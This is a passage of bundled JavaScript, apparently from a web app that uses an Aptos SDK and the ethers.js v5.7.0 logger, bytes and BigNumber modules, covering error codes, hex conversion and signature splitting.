    $a7ef34a427d74c9c$export$9727ea9b7f41a19,
    $a7ef34a427d74c9c$export$7fe2a082bcb32be2,
    $a7ef34a427d74c9c$export$5af241b06a37f277,
    $a7ef34a427d74c9c$export$50d5ae96d62a00f7,
    $a7ef34a427d74c9c$export$5228de05397d21fd,
    $a7ef34a427d74c9c$export$7cbbaa09450d3249,
    $a7ef34a427d74c9c$export$bb470345de966f4c,
    $a7ef34a427d74c9c$export$79a305cfb9e127fc,
    $a7ef34a427d74c9c$export$5688f6f0c2eb36b3,
    $a7ef34a427d74c9c$export$999cf8764bf9bbd6,
    $a7ef34a427d74c9c$export$ba054f595f737627,
    $a7ef34a427d74c9c$export$fd2a501ff1129ef7,
    $a7ef34a427d74c9c$export$3adaf9223d82a615,
    $a7ef34a427d74c9c$export$d4c56134106f58d1,
    $a7ef34a427d74c9c$export$5f7dbec1675cde76
];
var $a7ef34a427d74c9c$export$3358ba326f0dad8b = /** @class */ function() {
    function AptosMultiAgentSignatureRequestSender() {}
    AptosMultiAgentSignatureRequestSender.create = function(input) {
        if ($a7ef34a427d74c9c$export$58622fd9455a8cd7.isInput(input)) return $a7ef34a427d74c9c$export$58622fd9455a8cd7.create(input);
        if ($a7ef34a427d74c9c$export$55dc148272439b32.isInput(input)) return $a7ef34a427d74c9c$export$55dc148272439b32.create(input);
        throw new Error("Cannot resolve union from AptosMultiAgentSignatureRequestSenderInput");
    };
    AptosMultiAgentSignatureRequestSender.fromJSON = function(json) {
        if ($a7ef34a427d74c9c$export$58622fd9455a8cd7.isJSON(json)) return $a7ef34a427d74c9c$export$58622fd9455a8cd7.fromJSON(json);
        if ($a7ef34a427d74c9c$export$55dc148272439b32.isJSON(json)) return $a7ef34a427d74c9c$export$55dc148272439b32.fromJSON(json);
        var keys = Object.keys(json).join(", ");
        var type = json.type;
        throw new Error("Cannot resolve union from AptosMultiAgentSignatureRequestSenderJSON (keys: ".concat(keys, ", type: ").concat(type, ")"));
    };
    AptosMultiAgentSignatureRequestSender.toJSON = function(value) {
        if (value instanceof $a7ef34a427d74c9c$export$58622fd9455a8cd7) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$55dc148272439b32) return value.toJSON();
        throw new Error("Cannot resolve union from AptosMultiAgentSignatureRequestSenderValue");
    };
    return AptosMultiAgentSignatureRequestSender;
}();




const $4b9cd088fca23de9$export$83d89fbfd8236492 = "logger/5.7.0";


"use strict";
let $97a8d5981d597bb7$var$_permanentCensorErrors = false;
let $97a8d5981d597bb7$var$_censorErrors = false;
const $97a8d5981d597bb7$var$LogLevels = {
    debug: 1,
    "default": 2,
    info: 2,
    warning: 3,
    error: 4,
    off: 5
};
let $97a8d5981d597bb7$var$_logLevel = $97a8d5981d597bb7$var$LogLevels["default"];
let $97a8d5981d597bb7$var$_globalLogger = null;
function $97a8d5981d597bb7$var$_checkNormalize() {
    try {
        const missing = [];
        // Make sure all forms of normalization are supported
        [
            "NFD",
            "NFC",
            "NFKD",
            "NFKC"
        ].forEach((form)=>{
            try {
                if ("test".normalize(form) !== "test") throw new Error("bad normalize");
            } catch (error) {
                missing.push(form);
            }
        });
        if (missing.length) throw new Error("missing " + missing.join(", "));
        if (String.fromCharCode(0xe9).normalize("NFD") !== String.fromCharCode(0x65, 0x0301)) throw new Error("broken implementation");
    } catch (error) {
        return error.message;
    }
    return null;
}
const $97a8d5981d597bb7$var$_normalizeError = $97a8d5981d597bb7$var$_checkNormalize();
var $97a8d5981d597bb7$export$243e62d78d3b544d;
(function(LogLevel) {
    LogLevel["DEBUG"] = "DEBUG";
    LogLevel["INFO"] = "INFO";
    LogLevel["WARNING"] = "WARNING";
    LogLevel["ERROR"] = "ERROR";
    LogLevel["OFF"] = "OFF";
})($97a8d5981d597bb7$export$243e62d78d3b544d || ($97a8d5981d597bb7$export$243e62d78d3b544d = {}));
var $97a8d5981d597bb7$export$d4e71bc0b80dc0fb;
(function(ErrorCode) {
    ///////////////////
    // Generic Errors
    // Unknown Error
    ErrorCode["UNKNOWN_ERROR"] = "UNKNOWN_ERROR";
    // Not Implemented
    ErrorCode["NOT_IMPLEMENTED"] = "NOT_IMPLEMENTED";
    // Unsupported Operation
    //   - operation
    ErrorCode["UNSUPPORTED_OPERATION"] = "UNSUPPORTED_OPERATION";
    // Network Error (i.e. Ethereum Network, such as an invalid chain ID)
    //   - event ("noNetwork" is not re-thrown in provider.ready; otherwise thrown)
    ErrorCode["NETWORK_ERROR"] = "NETWORK_ERROR";
    // Some sort of bad response from the server
    ErrorCode["SERVER_ERROR"] = "SERVER_ERROR";
    // Timeout
    ErrorCode["TIMEOUT"] = "TIMEOUT";
    ///////////////////
    // Operational  Errors
    // Buffer Overrun
    ErrorCode["BUFFER_OVERRUN"] = "BUFFER_OVERRUN";
    // Numeric Fault
    //   - operation: the operation being executed
    //   - fault: the reason this faulted
    ErrorCode["NUMERIC_FAULT"] = "NUMERIC_FAULT";
    ///////////////////
    // Argument Errors
    // Missing new operator to an object
    //  - name: The name of the class
    ErrorCode["MISSING_NEW"] = "MISSING_NEW";
    // Invalid argument (e.g. value is incompatible with type) to a function:
    //   - argument: The argument name that was invalid
    //   - value: The value of the argument
    ErrorCode["INVALID_ARGUMENT"] = "INVALID_ARGUMENT";
    // Missing argument to a function:
    //   - count: The number of arguments received
    //   - expectedCount: The number of arguments expected
    ErrorCode["MISSING_ARGUMENT"] = "MISSING_ARGUMENT";
    // Too many arguments
    //   - count: The number of arguments received
    //   - expectedCount: The number of arguments expected
    ErrorCode["UNEXPECTED_ARGUMENT"] = "UNEXPECTED_ARGUMENT";
    ///////////////////
    // Blockchain Errors
    // Call exception
    //  - transaction: the transaction
    //  - address?: the contract address
    //  - args?: The arguments passed into the function
    //  - method?: The Solidity method signature
    //  - errorSignature?: The EIP848 error signature
    //  - errorArgs?: The EIP848 error parameters
    //  - reason: The reason (only for EIP848 "Error(string)")
    ErrorCode["CALL_EXCEPTION"] = "CALL_EXCEPTION";
    // Insufficient funds (< value + gasLimit * gasPrice)
    //   - transaction: the transaction attempted
    ErrorCode["INSUFFICIENT_FUNDS"] = "INSUFFICIENT_FUNDS";
    // Nonce has already been used
    //   - transaction: the transaction attempted
    ErrorCode["NONCE_EXPIRED"] = "NONCE_EXPIRED";
    // The replacement fee for the transaction is too low
    //   - transaction: the transaction attempted
    ErrorCode["REPLACEMENT_UNDERPRICED"] = "REPLACEMENT_UNDERPRICED";
    // The gas limit could not be estimated
    //   - transaction: the transaction passed to estimateGas
    ErrorCode["UNPREDICTABLE_GAS_LIMIT"] = "UNPREDICTABLE_GAS_LIMIT";
    // The transaction was replaced by one with a higher gas price
    //   - reason: "cancelled", "replaced" or "repriced"
    //   - cancelled: true if reason == "cancelled" or reason == "replaced")
    //   - hash: original transaction hash
    //   - replacement: the full TransactionsResponse for the replacement
    //   - receipt: the receipt of the replacement
    ErrorCode["TRANSACTION_REPLACED"] = "TRANSACTION_REPLACED";
    ///////////////////
    // Interaction Errors
    // The user rejected the action, such as signing a message or sending
    // a transaction
    ErrorCode["ACTION_REJECTED"] = "ACTION_REJECTED";
})($97a8d5981d597bb7$export$d4e71bc0b80dc0fb || ($97a8d5981d597bb7$export$d4e71bc0b80dc0fb = {}));
const $97a8d5981d597bb7$var$HEX = "0123456789abcdef";
class $97a8d5981d597bb7$export$efa9a398d6368992 {
    constructor(version){
        Object.defineProperty(this, "version", {
            enumerable: true,
            value: version,
            writable: false
        });
    }
    _log(logLevel, args) {
        const level = logLevel.toLowerCase();
        if ($97a8d5981d597bb7$var$LogLevels[level] == null) this.throwArgumentError("invalid log level name", "logLevel", logLevel);
        if ($97a8d5981d597bb7$var$_logLevel > $97a8d5981d597bb7$var$LogLevels[level]) return;
        console.log.apply(console, args);
    }
    debug(...args) {
        this._log($97a8d5981d597bb7$export$efa9a398d6368992.levels.DEBUG, args);
    }
    info(...args) {
        this._log($97a8d5981d597bb7$export$efa9a398d6368992.levels.INFO, args);
    }
    warn(...args) {
        this._log($97a8d5981d597bb7$export$efa9a398d6368992.levels.WARNING, args);
    }
    makeError(message, code, params) {
        // Errors are being censored
        if ($97a8d5981d597bb7$var$_censorErrors) return this.makeError("censored error", code, {});
        if (!code) code = $97a8d5981d597bb7$export$efa9a398d6368992.errors.UNKNOWN_ERROR;
        if (!params) params = {};
        const messageDetails = [];
        Object.keys(params).forEach((key)=>{
            const value = params[key];
            try {
                if (value instanceof Uint8Array) {
                    let hex = "";
                    for(let i = 0; i < value.length; i++){
                        hex += $97a8d5981d597bb7$var$HEX[value[i] >> 4];
                        hex += $97a8d5981d597bb7$var$HEX[value[i] & 0x0f];
                    }
                    messageDetails.push(key + "=Uint8Array(0x" + hex + ")");
                } else messageDetails.push(key + "=" + JSON.stringify(value));
            } catch (error) {
                messageDetails.push(key + "=" + JSON.stringify(params[key].toString()));
            }
        });
        messageDetails.push(`code=${code}`);
        messageDetails.push(`version=${this.version}`);
        const reason = message;
        let url = "";
        switch(code){
            case $97a8d5981d597bb7$export$d4e71bc0b80dc0fb.NUMERIC_FAULT:
                {
                    url = "NUMERIC_FAULT";
                    const fault = message;
                    switch(fault){
                        case "overflow":
                        case "underflow":
                        case "division-by-zero":
                            url += "-" + fault;
                            break;
                        case "negative-power":
                        case "negative-width":
                            url += "-unsupported";
                            break;
                        case "unbound-bitwise-result":
                            url += "-unbound-result";
                            break;
                    }
                    break;
                }
            case $97a8d5981d597bb7$export$d4e71bc0b80dc0fb.CALL_EXCEPTION:
            case $97a8d5981d597bb7$export$d4e71bc0b80dc0fb.INSUFFICIENT_FUNDS:
            case $97a8d5981d597bb7$export$d4e71bc0b80dc0fb.MISSING_NEW:
            case $97a8d5981d597bb7$export$d4e71bc0b80dc0fb.NONCE_EXPIRED:
            case $97a8d5981d597bb7$export$d4e71bc0b80dc0fb.REPLACEMENT_UNDERPRICED:
            case $97a8d5981d597bb7$export$d4e71bc0b80dc0fb.TRANSACTION_REPLACED:
            case $97a8d5981d597bb7$export$d4e71bc0b80dc0fb.UNPREDICTABLE_GAS_LIMIT:
                url = code;
                break;
        }
        if (url) message += " [ See: https://links.ethers.org/v5-errors-" + url + " ]";
        if (messageDetails.length) message += " (" + messageDetails.join(", ") + ")";
        // @TODO: Any??
        const error = new Error(message);
        error.reason = reason;
        error.code = code;
        Object.keys(params).forEach(function(key) {
            error[key] = params[key];
        });
        return error;
    }
    throwError(message, code, params) {
        throw this.makeError(message, code, params);
    }
    throwArgumentError(message, name, value) {
        return this.throwError(message, $97a8d5981d597bb7$export$efa9a398d6368992.errors.INVALID_ARGUMENT, {
            argument: name,
            value: value
        });
    }
    assert(condition, message, code, params) {
        if (!!condition) return;
        this.throwError(message, code, params);
    }
    assertArgument(condition, message, name, value) {
        if (!!condition) return;
        this.throwArgumentError(message, name, value);
    }
    checkNormalize(message) {
        if (message == null) message = "platform missing String.prototype.normalize";
        if ($97a8d5981d597bb7$var$_normalizeError) this.throwError("platform missing String.prototype.normalize", $97a8d5981d597bb7$export$efa9a398d6368992.errors.UNSUPPORTED_OPERATION, {
            operation: "String.prototype.normalize",
            form: $97a8d5981d597bb7$var$_normalizeError
        });
    }
    checkSafeUint53(value, message) {
        if (typeof value !== "number") return;
        if (message == null) message = "value not safe";
        if (value < 0 || value >= 0x1fffffffffffff) this.throwError(message, $97a8d5981d597bb7$export$efa9a398d6368992.errors.NUMERIC_FAULT, {
            operation: "checkSafeInteger",
            fault: "out-of-safe-range",
            value: value
        });
        if (value % 1) this.throwError(message, $97a8d5981d597bb7$export$efa9a398d6368992.errors.NUMERIC_FAULT, {
            operation: "checkSafeInteger",
            fault: "non-integer",
            value: value
        });
    }
    checkArgumentCount(count, expectedCount, message) {
        if (message) message = ": " + message;
        else message = "";
        if (count < expectedCount) this.throwError("missing argument" + message, $97a8d5981d597bb7$export$efa9a398d6368992.errors.MISSING_ARGUMENT, {
            count: count,
            expectedCount: expectedCount
        });
        if (count > expectedCount) this.throwError("too many arguments" + message, $97a8d5981d597bb7$export$efa9a398d6368992.errors.UNEXPECTED_ARGUMENT, {
            count: count,
            expectedCount: expectedCount
        });
    }
    checkNew(target, kind) {
        if (target === Object || target == null) this.throwError("missing new", $97a8d5981d597bb7$export$efa9a398d6368992.errors.MISSING_NEW, {
            name: kind.name
        });
    }
    checkAbstract(target, kind) {
        if (target === kind) this.throwError("cannot instantiate abstract class " + JSON.stringify(kind.name) + " directly; use a sub-class", $97a8d5981d597bb7$export$efa9a398d6368992.errors.UNSUPPORTED_OPERATION, {
            name: target.name,
            operation: "new"
        });
        else if (target === Object || target == null) this.throwError("missing new", $97a8d5981d597bb7$export$efa9a398d6368992.errors.MISSING_NEW, {
            name: kind.name
        });
    }
    static globalLogger() {
        if (!$97a8d5981d597bb7$var$_globalLogger) $97a8d5981d597bb7$var$_globalLogger = new $97a8d5981d597bb7$export$efa9a398d6368992((0, $4b9cd088fca23de9$export$83d89fbfd8236492));
        return $97a8d5981d597bb7$var$_globalLogger;
    }
    static setCensorship(censorship, permanent) {
        if (!censorship && permanent) this.globalLogger().throwError("cannot permanently disable censorship", $97a8d5981d597bb7$export$efa9a398d6368992.errors.UNSUPPORTED_OPERATION, {
            operation: "setCensorship"
        });
        if ($97a8d5981d597bb7$var$_permanentCensorErrors) {
            if (!censorship) return;
            this.globalLogger().throwError("error censorship permanent", $97a8d5981d597bb7$export$efa9a398d6368992.errors.UNSUPPORTED_OPERATION, {
                operation: "setCensorship"
            });
        }
        $97a8d5981d597bb7$var$_censorErrors = !!censorship;
        $97a8d5981d597bb7$var$_permanentCensorErrors = !!permanent;
    }
    static setLogLevel(logLevel) {
        const level = $97a8d5981d597bb7$var$LogLevels[logLevel.toLowerCase()];
        if (level == null) {
            $97a8d5981d597bb7$export$efa9a398d6368992.globalLogger().warn("invalid log level - " + logLevel);
            return;
        }
        $97a8d5981d597bb7$var$_logLevel = level;
    }
    static from(version) {
        return new $97a8d5981d597bb7$export$efa9a398d6368992(version);
    }
}
$97a8d5981d597bb7$export$efa9a398d6368992.errors = $97a8d5981d597bb7$export$d4e71bc0b80dc0fb;
$97a8d5981d597bb7$export$efa9a398d6368992.levels = $97a8d5981d597bb7$export$243e62d78d3b544d;


const $95fe903f324809f2$export$83d89fbfd8236492 = "bytes/5.7.0";


"use strict";
const $7b88b6e03e4708f2$var$logger = new (0, $97a8d5981d597bb7$export$efa9a398d6368992)((0, $95fe903f324809f2$export$83d89fbfd8236492));
///////////////////////////////
function $7b88b6e03e4708f2$var$isHexable(value) {
    return !!value.toHexString;
}
function $7b88b6e03e4708f2$var$addSlice(array) {
    if (array.slice) return array;
    array.slice = function() {
        const args = Array.prototype.slice.call(arguments);
        return $7b88b6e03e4708f2$var$addSlice(new Uint8Array(Array.prototype.slice.apply(array, args)));
    };
    return array;
}
function $7b88b6e03e4708f2$export$9a14abb1a440cd5e(value) {
    return $7b88b6e03e4708f2$export$b02a40aff8e4ad18(value) && !(value.length % 2) || $7b88b6e03e4708f2$export$c6fabfbfd097fc30(value);
}
function $7b88b6e03e4708f2$var$isInteger(value) {
    return typeof value === "number" && value == value && value % 1 === 0;
}
function $7b88b6e03e4708f2$export$c6fabfbfd097fc30(value) {
    if (value == null) return false;
    if (value.constructor === Uint8Array) return true;
    if (typeof value === "string") return false;
    if (!$7b88b6e03e4708f2$var$isInteger(value.length) || value.length < 0) return false;
    for(let i = 0; i < value.length; i++){
        const v = value[i];
        if (!$7b88b6e03e4708f2$var$isInteger(v) || v < 0 || v >= 256) return false;
    }
    return true;
}
function $7b88b6e03e4708f2$export$3131421a7d01b4fb(value, options) {
    if (!options) options = {};
    if (typeof value === "number") {
        $7b88b6e03e4708f2$var$logger.checkSafeUint53(value, "invalid arrayify value");
        const result = [];
        while(value){
            result.unshift(value & 0xff);
            value = parseInt(String(value / 256));
        }
        if (result.length === 0) result.push(0);
        return $7b88b6e03e4708f2$var$addSlice(new Uint8Array(result));
    }
    if (options.allowMissingPrefix && typeof value === "string" && value.substring(0, 2) !== "0x") value = "0x" + value;
    if ($7b88b6e03e4708f2$var$isHexable(value)) value = value.toHexString();
    if ($7b88b6e03e4708f2$export$b02a40aff8e4ad18(value)) {
        let hex = value.substring(2);
        if (hex.length % 2) {
            if (options.hexPad === "left") hex = "0" + hex;
            else if (options.hexPad === "right") hex += "0";
            else $7b88b6e03e4708f2$var$logger.throwArgumentError("hex data is odd-length", "value", value);
        }
        const result = [];
        for(let i = 0; i < hex.length; i += 2)result.push(parseInt(hex.substring(i, i + 2), 16));
        return $7b88b6e03e4708f2$var$addSlice(new Uint8Array(result));
    }
    if ($7b88b6e03e4708f2$export$c6fabfbfd097fc30(value)) return $7b88b6e03e4708f2$var$addSlice(new Uint8Array(value));
    return $7b88b6e03e4708f2$var$logger.throwArgumentError("invalid arrayify value", "value", value);
}
function $7b88b6e03e4708f2$export$ee1b3e54f0441b22(items) {
    const objects = items.map((item)=>$7b88b6e03e4708f2$export$3131421a7d01b4fb(item));
    const length = objects.reduce((accum, item)=>accum + item.length, 0);
    const result = new Uint8Array(length);
    objects.reduce((offset, object)=>{
        result.set(object, offset);
        return offset + object.length;
    }, 0);
    return $7b88b6e03e4708f2$var$addSlice(result);
}
function $7b88b6e03e4708f2$export$a8f4574d0e56446c(value) {
    let result = $7b88b6e03e4708f2$export$3131421a7d01b4fb(value);
    if (result.length === 0) return result;
    // Find the first non-zero entry
    let start = 0;
    while(start < result.length && result[start] === 0)start++;
    // If we started with zeros, strip them
    if (start) result = result.slice(start);
    return result;
}
function $7b88b6e03e4708f2$export$3cdc770bf8b2ed3d(value, length) {
    value = $7b88b6e03e4708f2$export$3131421a7d01b4fb(value);
    if (value.length > length) $7b88b6e03e4708f2$var$logger.throwArgumentError("value out of range", "value", arguments[0]);
    const result = new Uint8Array(length);
    result.set(value, length - value.length);
    return $7b88b6e03e4708f2$var$addSlice(result);
}
function $7b88b6e03e4708f2$export$b02a40aff8e4ad18(value, length) {
    if (typeof value !== "string" || !value.match(/^0x[0-9A-Fa-f]*$/)) return false;
    if (length && value.length !== 2 + 2 * length) return false;
    return true;
}
const $7b88b6e03e4708f2$var$HexCharacters = "0123456789abcdef";
function $7b88b6e03e4708f2$export$2b0d6b5fbe698c70(value, options) {
    if (!options) options = {};
    if (typeof value === "number") {
        $7b88b6e03e4708f2$var$logger.checkSafeUint53(value, "invalid hexlify value");
        let hex = "";
        while(value){
            hex = $7b88b6e03e4708f2$var$HexCharacters[value & 0xf] + hex;
            value = Math.floor(value / 16);
        }
        if (hex.length) {
            if (hex.length % 2) hex = "0" + hex;
            return "0x" + hex;
        }
        return "0x00";
    }
    if (typeof value === "bigint") {
        value = value.toString(16);
        if (value.length % 2) return "0x0" + value;
        return "0x" + value;
    }
    if (options.allowMissingPrefix && typeof value === "string" && value.substring(0, 2) !== "0x") value = "0x" + value;
    if ($7b88b6e03e4708f2$var$isHexable(value)) return value.toHexString();
    if ($7b88b6e03e4708f2$export$b02a40aff8e4ad18(value)) {
        if (value.length % 2) {
            if (options.hexPad === "left") value = "0x0" + value.substring(2);
            else if (options.hexPad === "right") value += "0";
            else $7b88b6e03e4708f2$var$logger.throwArgumentError("hex data is odd-length", "value", value);
        }
        return value.toLowerCase();
    }
    if ($7b88b6e03e4708f2$export$c6fabfbfd097fc30(value)) {
        let result = "0x";
        for(let i = 0; i < value.length; i++){
            let v = value[i];
            result += $7b88b6e03e4708f2$var$HexCharacters[(v & 0xf0) >> 4] + $7b88b6e03e4708f2$var$HexCharacters[v & 0x0f];
        }
        return result;
    }
    return $7b88b6e03e4708f2$var$logger.throwArgumentError("invalid hexlify value", "value", value);
}
function $7b88b6e03e4708f2$export$13882f896d3c0683(data) {
    if (typeof data !== "string") data = $7b88b6e03e4708f2$export$2b0d6b5fbe698c70(data);
    else if (!$7b88b6e03e4708f2$export$b02a40aff8e4ad18(data) || data.length % 2) return null;
    return (data.length - 2) / 2;
}
function $7b88b6e03e4708f2$export$15da666eba198c18(data, offset, endOffset) {
    if (typeof data !== "string") data = $7b88b6e03e4708f2$export$2b0d6b5fbe698c70(data);
    else if (!$7b88b6e03e4708f2$export$b02a40aff8e4ad18(data) || data.length % 2) $7b88b6e03e4708f2$var$logger.throwArgumentError("invalid hexData", "value", data);
    offset = 2 + 2 * offset;
    if (endOffset != null) return "0x" + data.substring(offset, 2 + 2 * endOffset);
    return "0x" + data.substring(offset);
}
function $7b88b6e03e4708f2$export$6d4b99629b38754a(items) {
    let result = "0x";
    items.forEach((item)=>{
        result += $7b88b6e03e4708f2$export$2b0d6b5fbe698c70(item).substring(2);
    });
    return result;
}
function $7b88b6e03e4708f2$export$6916af760a341dd3(value) {
    const trimmed = $7b88b6e03e4708f2$export$967bc0082a978949($7b88b6e03e4708f2$export$2b0d6b5fbe698c70(value, {
        hexPad: "left"
    }));
    if (trimmed === "0x") return "0x0";
    return trimmed;
}
function $7b88b6e03e4708f2$export$967bc0082a978949(value) {
    if (typeof value !== "string") value = $7b88b6e03e4708f2$export$2b0d6b5fbe698c70(value);
    if (!$7b88b6e03e4708f2$export$b02a40aff8e4ad18(value)) $7b88b6e03e4708f2$var$logger.throwArgumentError("invalid hex string", "value", value);
    value = value.substring(2);
    let offset = 0;
    while(offset < value.length && value[offset] === "0")offset++;
    return "0x" + value.substring(offset);
}
function $7b88b6e03e4708f2$export$e9c46a54370b47e8(value, length) {
    if (typeof value !== "string") value = $7b88b6e03e4708f2$export$2b0d6b5fbe698c70(value);
    else if (!$7b88b6e03e4708f2$export$b02a40aff8e4ad18(value)) $7b88b6e03e4708f2$var$logger.throwArgumentError("invalid hex string", "value", value);
    if (value.length > 2 * length + 2) $7b88b6e03e4708f2$var$logger.throwArgumentError("value out of range", "value", arguments[1]);
    while(value.length < 2 * length + 2)value = "0x0" + value.substring(2);
    return value;
}
function $7b88b6e03e4708f2$export$7fb170f1e457988f(signature) {
    const result = {
        r: "0x",
        s: "0x",
        _vs: "0x",
        recoveryParam: 0,
        v: 0,
        yParityAndS: "0x",
        compact: "0x"
    };
    if ($7b88b6e03e4708f2$export$9a14abb1a440cd5e(signature)) {
        let bytes = $7b88b6e03e4708f2$export$3131421a7d01b4fb(signature);
        // Get the r, s and v
        if (bytes.length === 64) {
            // EIP-2098; pull the v from the top bit of s and clear it
            result.v = 27 + (bytes[32] >> 7);
            bytes[32] &= 0x7f;
            result.r = $7b88b6e03e4708f2$export$2b0d6b5fbe698c70(bytes.slice(0, 32));
            result.s = $7b88b6e03e4708f2$export$2b0d6b5fbe698c70(bytes.slice(32, 64));
        } else if (bytes.length === 65) {
            result.r = $7b88b6e03e4708f2$export$2b0d6b5fbe698c70(bytes.slice(0, 32));
            result.s = $7b88b6e03e4708f2$export$2b0d6b5fbe698c70(bytes.slice(32, 64));
            result.v = bytes[64];
        } else $7b88b6e03e4708f2$var$logger.throwArgumentError("invalid signature string", "signature", signature);
        // Allow a recid to be used as the v
        if (result.v < 27) {
            if (result.v === 0 || result.v === 1) result.v += 27;
            else $7b88b6e03e4708f2$var$logger.throwArgumentError("signature invalid v byte", "signature", signature);
        }
        // Compute recoveryParam from v
        result.recoveryParam = 1 - result.v % 2;
        // Compute _vs from recoveryParam and s
        if (result.recoveryParam) bytes[32] |= 0x80;
        result._vs = $7b88b6e03e4708f2$export$2b0d6b5fbe698c70(bytes.slice(32, 64));
    } else {
        result.r = signature.r;
        result.s = signature.s;
        result.v = signature.v;
        result.recoveryParam = signature.recoveryParam;
        result._vs = signature._vs;
        // If the _vs is available, use it to populate missing s, v and recoveryParam
        // and verify non-missing s, v and recoveryParam
        if (result._vs != null) {
            const vs = $7b88b6e03e4708f2$export$3cdc770bf8b2ed3d($7b88b6e03e4708f2$export$3131421a7d01b4fb(result._vs), 32);
            result._vs = $7b88b6e03e4708f2$export$2b0d6b5fbe698c70(vs);
            // Set or check the recid
            const recoveryParam = vs[0] >= 128 ? 1 : 0;
            if (result.recoveryParam == null) result.recoveryParam = recoveryParam;
            else if (result.recoveryParam !== recoveryParam) $7b88b6e03e4708f2$var$logger.throwArgumentError("signature recoveryParam mismatch _vs", "signature", signature);
            // Set or check the s
            vs[0] &= 0x7f;
            const s = $7b88b6e03e4708f2$export$2b0d6b5fbe698c70(vs);
            if (result.s == null) result.s = s;
            else if (result.s !== s) $7b88b6e03e4708f2$var$logger.throwArgumentError("signature v mismatch _vs", "signature", signature);
        }
        // Use recid and v to populate each other
        if (result.recoveryParam == null) {
            if (result.v == null) $7b88b6e03e4708f2$var$logger.throwArgumentError("signature missing v and recoveryParam", "signature", signature);
            else if (result.v === 0 || result.v === 1) result.recoveryParam = result.v;
            else result.recoveryParam = 1 - result.v % 2;
        } else if (result.v == null) result.v = 27 + result.recoveryParam;
        else {
            const recId = result.v === 0 || result.v === 1 ? result.v : 1 - result.v % 2;
            if (result.recoveryParam !== recId) $7b88b6e03e4708f2$var$logger.throwArgumentError("signature recoveryParam mismatch v", "signature", signature);
        }
        if (result.r == null || !$7b88b6e03e4708f2$export$b02a40aff8e4ad18(result.r)) $7b88b6e03e4708f2$var$logger.throwArgumentError("signature missing or invalid r", "signature", signature);
        else result.r = $7b88b6e03e4708f2$export$e9c46a54370b47e8(result.r, 32);
        if (result.s == null || !$7b88b6e03e4708f2$export$b02a40aff8e4ad18(result.s)) $7b88b6e03e4708f2$var$logger.throwArgumentError("signature missing or invalid s", "signature", signature);
        else result.s = $7b88b6e03e4708f2$export$e9c46a54370b47e8(result.s, 32);
        const vs = $7b88b6e03e4708f2$export$3131421a7d01b4fb(result.s);
        if (vs[0] >= 128) $7b88b6e03e4708f2$var$logger.throwArgumentError("signature s out of range", "signature", signature);
        if (result.recoveryParam) vs[0] |= 0x80;
        const _vs = $7b88b6e03e4708f2$export$2b0d6b5fbe698c70(vs);
        if (result._vs) {
            if (!$7b88b6e03e4708f2$export$b02a40aff8e4ad18(result._vs)) $7b88b6e03e4708f2$var$logger.throwArgumentError("signature invalid _vs", "signature", signature);
            result._vs = $7b88b6e03e4708f2$export$e9c46a54370b47e8(result._vs, 32);
        }
        // Set or check the _vs
        if (result._vs == null) result._vs = _vs;
        else if (result._vs !== _vs) $7b88b6e03e4708f2$var$logger.throwArgumentError("signature _vs mismatch v and s", "signature", signature);
    }
    result.yParityAndS = result._vs;
    result.compact = result.r + result.yParityAndS.substring(2);
    return result;
}
function $7b88b6e03e4708f2$export$71bb9d78a59bbe25(signature) {
    signature = $7b88b6e03e4708f2$export$7fb170f1e457988f(signature);
    return $7b88b6e03e4708f2$export$2b0d6b5fbe698c70($7b88b6e03e4708f2$export$ee1b3e54f0441b22([
        signature.r,
        signature.s,
        signature.recoveryParam ? "0x1c" : "0x1b"
    ]));
}



var $dEXSZ = parcelRequire("dEXSZ");


const $a38aef31efdfa85e$export$83d89fbfd8236492 = "bignumber/5.7.0";


"use strict";
var $0df4577496dcf693$var$BN = (0, (/*@__PURE__*/$parcel$interopDefault($dEXSZ))).BN;
const $0df4577496dcf693$var$logger = new (0, $97a8d5981d597bb7$export$efa9a398d6368992)((0, $a38aef31efdfa85e$export$83d89fbfd8236492));
const $0df4577496dcf693$var$_constructorGuard = {};
const $0df4577496dcf693$var$MAX_SAFE = 0x1fffffffffffff;
function $0df4577496dcf693$export$a3d0a7fa9b65683b(value) {
    return value != null && ($0df4577496dcf693$export$d97aa349ed20696.isBigNumber(value) || typeof value === "number" && value % 1 === 0 || typeof value === "string" && !!value.match(/^-?[0-9]+$/) || (0, $7b88b6e03e4708f2$export$b02a40aff8e4ad18)(value) || typeof value === "bigint" || (0, $7b88b6e03e4708f2$export$c6fabfbfd097fc30)(value));
}
// Only warn about passing 10 into radix once
let $0df4577496dcf693$var$_warnedToStringRadix = false;
class $0df4577496dcf693$export$d97aa349ed20696 {
    constructor(constructorGuard, hex){
        if (constructorGuard !== $0df4577496dcf693$var$_constructorGuard) $0df4577496dcf693$var$logger.throwError("cannot call constructor directly; use BigNumber.from", (0, $97a8d5981d597bb7$export$efa9a398d6368992).errors.UNSUPPORTED_OPERATION, {
            operation: "new (BigNumber)"
        });
        this._hex = hex;
        this._isBigNumber = true;
        Object.freeze(this);
    }
    fromTwos(value) {
        return $0df4577496dcf693$var$toBigNumber($0df4577496dcf693$var$toBN(this).fromTwos(value));
    }
    toTwos(value) {
        return $0df4577496dcf693$var$toBigNumber($0df4577496dcf693$var$toBN(this).toTwos(value));
    }
    abs() {
        if (this._hex[0] === "-") return $0df4577496dcf693$export$d97aa349ed20696.from(this._hex.substring(1));
        return this;
    }
    add(other) {
        return $0df4577496dcf693$var$toBigNumber($0df4577496dcf693$var$toBN(this).add($0df4577496dcf693$var$toBN(other)));
    }
    sub(other) {
        return $0df4577496dcf693$var$toBigNumber($0df4577496dcf693$var$toBN(this).sub($0df4577496dcf693$var$toBN(other)));
    }
    div(other) {
        const o = $0df4577496dcf693$export$d97aa349ed20696.from(other);
        if (o.isZero()) $0df4577496dcf693$var$throwFault("division-by-zero", "div");
        return $0df4577496dcf693$var$toBigNumber($0df4577496dcf693$var$toBN(this).div($0df4577496dcf693$var$toBN(other)));
    }
    mul(other) {
        return $0df4577496dcf693$var$toBigNumber($0df4577496dcf693$var$toBN(this).mul($0df4577496dcf693$var$toBN(other)));
    }
    mod(other) {
        const value = $0df4577496dcf693$var$toBN(other);
        if (value.isNeg()) $0df4577496dcf693$var$throwFault("division-by-zero", "mod");
        return $0df4577496dcf693$var$toBigNumber($0df4577496dcf693$var$toBN(this).umod(value));
    }
    pow(other) {
        const value = $0df4577496dcf693$var$toBN(other);
        if (value.isNeg()) $0df4577496dcf693$var$throwFault("negative-power", "pow");
        return $0df4577496dcf693$var$toBigNumber($0df4577496dcf693$var$toBN(this).pow(value));
    }
    and(other) {
